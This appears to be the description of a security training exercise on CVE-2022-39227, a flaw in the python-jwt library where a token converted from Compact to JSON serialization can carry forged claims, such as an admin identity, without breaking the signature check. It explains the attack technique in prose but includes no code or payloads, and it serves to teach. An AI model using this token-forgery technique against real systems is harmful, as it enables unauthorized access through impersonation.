JSON Web Token XV: CVE-2022-39227
This exercise covers the exploitation of polyglot token against python_jwt (CVE-2022-39227)
In this exercise, we delve into CVE-2022-39227, a vulnerability in the python-jwt library that allows an attacker to forge malicious tokens. The issue arises from the way the library parses both JWS Compact Serialization and JWS JSON Serialization formats. By manipulating the token from the Compact to the JSON format, an attacker can inject malicious claims without invalidating the signature.
The vulnerability enables the creation of a token that includes a fake payload to impersonate an admin user. Despite being in JSON format, the token remains valid as the signature is not rechecked. This exercise demonstrates the critical implications of improper token parsing and highlights the importance of robust security practices when handling JWTs.